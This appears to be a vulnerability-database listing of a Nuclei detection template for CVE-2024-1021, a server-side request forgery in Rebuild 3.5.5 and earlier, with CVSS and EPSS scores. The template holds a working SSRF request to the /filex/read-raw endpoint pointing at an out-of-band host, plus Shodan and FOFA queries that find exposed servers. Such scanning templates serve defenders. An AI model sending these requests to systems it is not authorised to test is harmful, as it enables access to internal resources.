Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-1021
HistoryFeb 25, 2024 - 4:56 a.m.

Rebuild <= 3.5.5 - Server-Side Request Forgery

2024-02-2504:56:05
ProjectDiscovery
github.com
13
cve2024
rebuild
ssrf
security
http
vulnerability
server-side

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.9 High

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

81.5%

There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
id: CVE-2024-1021

info:
  name: Rebuild <= 3.5.5 - Server-Side Request Forgery
  author: BMCel
  severity: critical
  description: |
    There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
  remediation: |
    Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
  reference:
    - https://github.com/getrebuild/rebuild
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1021
    - https://vuldb.com/?ctiid.252290
    - https://vuldb.com/?id.252290
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-1021
    cwe-id: CWE-918
    epss-score: 0.00973
    epss-percentile: 0.83349
    cpe: cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ruifang-tech
    product: rebuild
    shodan-query: http.favicon.hash:"871154672"
    fofa-query: "icon_hash=\"871154672\""
  tags: cve2024,cve,rebuild,ssrf,ruifang-tech

http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<h1> Interactsh Server </h1>")'
          - '!contains(body_1, "<h1> Interactsh Server </h1>")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a00483046022100ecd416627d1c6165d69bef643a983b65fafaabe6417bb79944e15af02b39b03f022100a5ed6b41e0bf5736e99ed54d1c1a53abe9956c3b773c3cf65c24507b7d2087eb:922c64590222798bb761d5b6d8e72950

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.9 High

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

81.5%

Related for NUCLEI:CVE-2024-1021